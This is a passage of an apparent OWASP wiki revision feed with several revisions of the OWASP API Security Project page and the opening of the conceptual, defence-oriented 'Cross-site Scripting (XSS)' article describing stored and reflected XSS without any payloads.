== Presentation ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project will be presented in 2016.&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[REST_Security_Cheat_Sheet]]&lt;br /&gt;
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API Enterprise Security API]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
Once API Security documents are created, they will be available for direct download here.&lt;br /&gt;
&lt;br /&gt;
The initial version of this document, including an up-to-date table of contents, is available [https://www.owasp.org/images/f/f6/Owasp_api_security_toc.pdf here].&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
&lt;br /&gt;
There has not yet been press coverage of this project.&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQ=&lt;br /&gt;
&lt;br /&gt;
==How can I participate in your project?==&lt;br /&gt;
This project welcomes contributors of all sorts. The easiest way to get involved is to contact the Project Leader, and indicate that you're willing to help.&lt;br /&gt;
&lt;br /&gt;
==What type of contributors are you seeking?==&lt;br /&gt;
We're currently looking for software developers who have experience building out resilient APIs, and security assessors who have assessed APIs. This project is currently in the &amp;quot;research&amp;quot; stage, meaning that the more you can contribute to building out the project, the better!&lt;br /&gt;
&lt;br /&gt;
==Can I still participate if I'm not a developer/assessor?==&lt;br /&gt;
Sure -- we just need to figure out the correct role. If you're strong with technical writing, that would be great; if there are other skill sets you think you can bring to the table, please let us know.&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is small, but will be maintained by volunteers. If you'd like to volunteer, please contact the Project Leader.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map and Getting Involved =&lt;br /&gt;
&lt;br /&gt;
The roadmap for this project is straightforward: we'll begin by conducting research and seeking feedback from developers and security auditors on the problems they most frequently encounter via web-based APIs. We'll create, from this research, the OWASP Top Ten API Security Risks, a sub-project of the API Security Project. Once this document is created (and maintained), we will also create guidelines in order to demonstrate each of the risks (as well as other, non-top-ten risks) and illustrate how to prevent them.&lt;br /&gt;
&lt;br /&gt;
'''Q4 2015 Priorities'''&lt;br /&gt;
* Establish the project, including mailing list, wiki page, etc.&lt;br /&gt;
* Conduct PR-related activities to involve the community at large.&lt;br /&gt;
* Conduct research to understand widely-accepted risks in APIs&lt;br /&gt;
* Compile Top Ten API Security Risks&lt;br /&gt;
* Publish and Publicize Top Ten API Security Risks&lt;br /&gt;
* Use data gathered in process to &amp;quot;reverse&amp;quot; the Top Ten, in order to create a Secure Development deliverable for APIs&lt;br /&gt;
&lt;br /&gt;
We'd love for you to get involved with this project if you feel you can contribute! Please contact the Project Leader to better understand how you can volunteer.&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Please refer to the [https://www.owasp.org/index.php/OWASP_API_Security_Project primary wiki page] to learn about this project.&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=247654</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=247654"/>
				<updated>2019-02-19T05:51:09Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Added a project leader&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP API Security Project==&lt;br /&gt;
&lt;br /&gt;
=== [24-Dec-2018] ===&lt;br /&gt;
'''The OWASP API Security Project is now under a new leadership.'''&lt;br /&gt;
'''A new roadmap and call for contribution will be published by the end of Jan 2019.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This project is designed to address the ever-increasing number of organizations that are deploying potentially sensitive APIs as part of their software offerings. These APIs are used for internal tasks and to interface with third parties. Unfortunately, many APIs do not undergo the rigorous security testing that would render them secure from attack.&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to provide value to software developers and security assessors by underscoring the potential risks in insecure APIs and illustrating how these risks may be mitigated. In order to facilitate this goal, the OWASP API Security Project will create and maintain a '''Top 10 API Security Risks''' document, as well as a '''documentation portal''' for best practices when creating or assessing APIs.&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
While working as developers or information security consultants, many people have encountered APIs as part of a project. While there are some resources to help create and evaluate these projects (such as the OWASP REST Security Cheat Sheet), there has not be a comprehensive security project designed to assist builders, breakers, and defenders in the community.&lt;br /&gt;
&lt;br /&gt;
This project aims to create:&lt;br /&gt;
&lt;br /&gt;
* The OWASP Top Ten API Security Risks document, which can easily underscore the most common risks in the area.&lt;br /&gt;
* Create a documentation portal for developers to build APIs in a secure manner.&lt;br /&gt;
* Work with the security community to maintain living documents that evolve with security trends.&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is this project? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to deliver actionable documentation on creating and deploying verifiably secure web APIs, as well as illustrating the major risks and shortfalls that APIs may encounter. By helping developers create resilient software, and helping assessors understand the subtle risks an API may entail, the goal of this project is to bring security to an increasingly programmatic world.&lt;br /&gt;
&lt;br /&gt;
The primary deliverables of this project are the '''OWASP Top Ten API Security Risks''' and a secure API development '''documentation portal.'''&lt;br /&gt;
&lt;br /&gt;
== Presentation ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project will be presented in 2016.&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[REST_Security_Cheat_Sheet]]&lt;br /&gt;
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API Enterprise Security API]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
Once API Security documents are created, they will be available for direct download here.&lt;br /&gt;
&lt;br /&gt;
The initial version of this document, including an up-to-date table of contents, is available [https://www.owasp.org/images/f/f6/Owasp_api_security_toc.pdf here].&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
&lt;br /&gt;
There has not yet been press coverage of this project.&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQ=&lt;br /&gt;
&lt;br /&gt;
==How can I participate in your project?==&lt;br /&gt;
This project welcomes contributors of all sorts. The easiest way to get involved is to contact the Project Leader, and indicate that you're willing to help.&lt;br /&gt;
&lt;br /&gt;
==What type of contributors are you seeking?==&lt;br /&gt;
We're currently looking for software developers who have experience building out resilient APIs, and security assessors who have assessed APIs. This project is currently in the &amp;quot;research&amp;quot; stage, meaning that the more you can contribute to building out the project, the better!&lt;br /&gt;
&lt;br /&gt;
==Can I still participate if I'm not a developer/assessor?==&lt;br /&gt;
Sure -- we just need to figure out the correct role. If you're strong with technical writing, that would be great; if there are other skill sets you think you can bring to the table, please let us know.&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is small, but will be maintained by volunteers. If you'd like to volunteer, please contact the Project Leader.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map and Getting Involved =&lt;br /&gt;
&lt;br /&gt;
The roadmap for this project is straightforward: we'll begin by conducting research and seeking feedback from developers and security auditors on the problems they most frequently encounter via web-based APIs. We'll create, from this research, the OWASP Top Ten API Security Risks, a sub-project of the API Security Project. Once this document is created (and maintained), we will also create guidelines in order to demonstrate each of the risks (as well as other, non-top-ten risks) and illustrate how to prevent them.&lt;br /&gt;
&lt;br /&gt;
'''Q4 2015 Priorities'''&lt;br /&gt;
* Establish the project, including mailing list, wiki page, etc.&lt;br /&gt;
* Conduct PR-related activities to involve the community at large.&lt;br /&gt;
* Conduct research to understand widely-accepted risks in APIs&lt;br /&gt;
* Compile Top Ten API Security Risks&lt;br /&gt;
* Publish and Publicize Top Ten API Security Risks&lt;br /&gt;
* Use data gathered in process to &amp;quot;reverse&amp;quot; the Top Ten, in order to create a Secure Development deliverable for APIs&lt;br /&gt;
&lt;br /&gt;
We'd love for you to get involved with this project if you feel you can contribute! Please contact the Project Leader to better understand how you can volunteer.&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Please refer to the [https://www.owasp.org/index.php/OWASP_API_Security_Project primary wiki page] to learn about this project.&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=246259</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=246259"/>
				<updated>2018-12-24T08:13:30Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: /* Main */  Leadership transfer&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP API Security Project==&lt;br /&gt;
&lt;br /&gt;
=== [24-Dec-2018] ===&lt;br /&gt;
'''The OWASP API Security Project is now under a new leadership.'''&lt;br /&gt;
'''A new roadmap and call for contribution will be published by the end of Jan 2019.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This project is designed to address the ever-increasing number of organizations that are deploying potentially sensitive APIs as part of their software offerings. These APIs are used for internal tasks and to interface with third parties. Unfortunately, many APIs do not undergo the rigorous security testing that would render them secure from attack.&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to provide value to software developers and security assessors by underscoring the potential risks in insecure APIs and illustrating how these risks may be mitigated. In order to facilitate this goal, the OWASP API Security Project will create and maintain a '''Top 10 API Security Risks''' document, as well as a '''documentation portal''' for best practices when creating or assessing APIs.&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
While working as developers or information security consultants, many people have encountered APIs as part of a project. While there are some resources to help create and evaluate these projects (such as the OWASP REST Security Cheat Sheet), there has not be a comprehensive security project designed to assist builders, breakers, and defenders in the community.&lt;br /&gt;
&lt;br /&gt;
This project aims to create:&lt;br /&gt;
&lt;br /&gt;
* The OWASP Top Ten API Security Risks document, which can easily underscore the most common risks in the area.&lt;br /&gt;
* Create a documentation portal for developers to build APIs in a secure manner.&lt;br /&gt;
* Work with the security community to maintain living documents that evolve with security trends.&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is this project? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to deliver actionable documentation on creating and deploying verifiably secure web APIs, as well as illustrating the major risks and shortfalls that APIs may encounter. By helping developers create resilient software, and helping assessors understand the subtle risks an API may entail, the goal of this project is to bring security to an increasingly programmatic world.&lt;br /&gt;
&lt;br /&gt;
The primary deliverables of this project are the '''OWASP Top Ten API Security Risks''' and a secure API development '''documentation portal.'''&lt;br /&gt;
&lt;br /&gt;
== Presentation ==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project will be presented in 2016.&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[REST_Security_Cheat_Sheet]]&lt;br /&gt;
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API Enterprise Security API]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
Once API Security documents are created, they will be available for direct download here.&lt;br /&gt;
&lt;br /&gt;
The initial version of this document, including an up-to-date table of contents, is available [https://www.owasp.org/images/f/f6/Owasp_api_security_toc.pdf here].&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
&lt;br /&gt;
There has not yet been press coverage of this project.&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQ=&lt;br /&gt;
&lt;br /&gt;
==How can I participate in your project?==&lt;br /&gt;
This project welcomes contributors of all sorts. The easiest way to get involved is to contact the Project Leader, and indicate that you're willing to help.&lt;br /&gt;
&lt;br /&gt;
==What type of contributors are you seeking?==&lt;br /&gt;
We're currently looking for software developers who have experience building out resilient APIs, and security assessors who have assessed APIs. This project is currently in the &amp;quot;research&amp;quot; stage, meaning that the more you can contribute to building out the project, the better!&lt;br /&gt;
&lt;br /&gt;
==Can I still participate if I'm not a developer/assessor?==&lt;br /&gt;
Sure -- we just need to figure out the correct role. If you're strong with technical writing, that would be great; if there are other skill sets you think you can bring to the table, please let us know.&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is small, but will be maintained by volunteers. If you'd like to volunteer, please contact the Project Leader.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map and Getting Involved =&lt;br /&gt;
&lt;br /&gt;
The roadmap for this project is straightforward: we'll begin by conducting research and seeking feedback from developers and security auditors on the problems they most frequently encounter via web-based APIs. We'll create, from this research, the OWASP Top Ten API Security Risks, a sub-project of the API Security Project. Once this document is created (and maintained), we will also create guidelines in order to demonstrate each of the risks (as well as other, non-top-ten risks) and illustrate how to prevent them.&lt;br /&gt;
&lt;br /&gt;
'''Q4 2015 Priorities'''&lt;br /&gt;
* Establish the project, including mailing list, wiki page, etc.&lt;br /&gt;
* Conduct PR-related activities to involve the community at large.&lt;br /&gt;
* Conduct research to understand widely-accepted risks in APIs&lt;br /&gt;
* Compile Top Ten API Security Risks&lt;br /&gt;
* Publish and Publicize Top Ten API Security Risks&lt;br /&gt;
* Use data gathered in process to &amp;quot;reverse&amp;quot; the Top Ten, in order to create a Secure Development deliverable for APIs&lt;br /&gt;
&lt;br /&gt;
We'd love for you to get involved with this project if you feel you can contribute! Please contact the Project Leader to better understand how you can volunteer.&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Please refer to the [https://www.owasp.org/index.php/OWASP_API_Security_Project primary wiki page] to learn about this project.&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Cross-site_Scripting_(XSS)&amp;diff=241142</id>
		<title>Cross-site Scripting (XSS)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Cross-site_Scripting_(XSS)&amp;diff=241142"/>
				<updated>2018-06-05T08:30:52Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Fixed typos&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{template: Attack}}&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
[[Category:OWASP ASDR Project]]&lt;br /&gt;
&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''&lt;br /&gt;
&lt;br /&gt;
[[Category:Security Focus Area]]&lt;br /&gt;
__NOTOC__&lt;br /&gt;
==Overview==&lt;br /&gt;
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.&lt;br /&gt;
&lt;br /&gt;
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. For more details on the different types of XSS flaws, see: [[Types of Cross-Site Scripting]].&lt;br /&gt;
&lt;br /&gt;
==Related Security Activities==&lt;br /&gt;
&lt;br /&gt;
===How to Avoid Cross-site scripting Vulnerabilities===&lt;br /&gt;
&lt;br /&gt;
See the [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
See the [[DOM based XSS Prevention Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
See the [[:Category:OWASP Guide Project|OWASP Development Guide]] article on [[Phishing|Phishing]].&lt;br /&gt;
&lt;br /&gt;
See the [[:Category:OWASP Guide Project|OWASP Development Guide]] article on [[Data Validation]].&lt;br /&gt;
&lt;br /&gt;
===How to Review Code for Cross-site scripting Vulnerabilities===&lt;br /&gt;
&lt;br /&gt;
See the [[:Category:OWASP Code Review Project|OWASP Code Review Guide]] article on [[Reviewing Code for Cross-site scripting]] Vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
===How to Test for Cross-site scripting  Vulnerabilities===&lt;br /&gt;
&lt;br /&gt;
See the latest [[:Category:OWASP Testing Project|OWASP Testing Guide]] article on how to test for the various kinds of XSS vulnerabilities.&lt;br /&gt;
* [[Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001)]] &lt;br /&gt;
* [[Testing_for_Stored_Cross_site_scripting_(OWASP-DV-002)]] &lt;br /&gt;
* [[Testing_for_DOM-based_Cross_site_scripting_(OWASP-DV-003)]]&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
Cross-Site Scripting (XSS) attacks occur when:&lt;br /&gt;
&lt;br /&gt;
# Data enters a Web application through an untrusted source, most frequently a web request. &lt;br /&gt;
# The data is included in dynamic content that is sent to a web user without being validated for malicious content. &lt;br /&gt;
&lt;br /&gt;
The malicious content sent to the web browser often takes the form of a segment of JavaScript, but may also include HTML, Flash, or any other type of code that the browser may execute. The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site.&lt;br /&gt;
&lt;br /&gt;
===[[#Stored and Reflected XSS Attacks|Stored and Reflected XSS Attacks]]===&lt;br /&gt;
XSS attacks can generally be categorized into two categories: stored and reflected. There is a third, much less well-known type of XSS attack called [[DOM Based XSS |DOM Based XSS]] that is discussed separately [[DOM Based XSS |here]].&lt;br /&gt;
&lt;br /&gt;
====Stored XSS Attacks====&lt;br /&gt;
Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-I XSS.&lt;br /&gt;
&lt;br /&gt;
====Reflected XSS Attacks====&lt;br /&gt;
Reflected attacks are those where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other website. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user’s browser. The browser then executes the code because it came from a &amp;quot;trusted&amp;quot; server.  Reflected XSS is also sometimes referred to as Non-Persistent or Type-II XSS.&lt;br /&gt;
&lt;br /&gt;
===Other Types of XSS Vulnerabilities===&lt;br /&gt;
&lt;br /&gt;
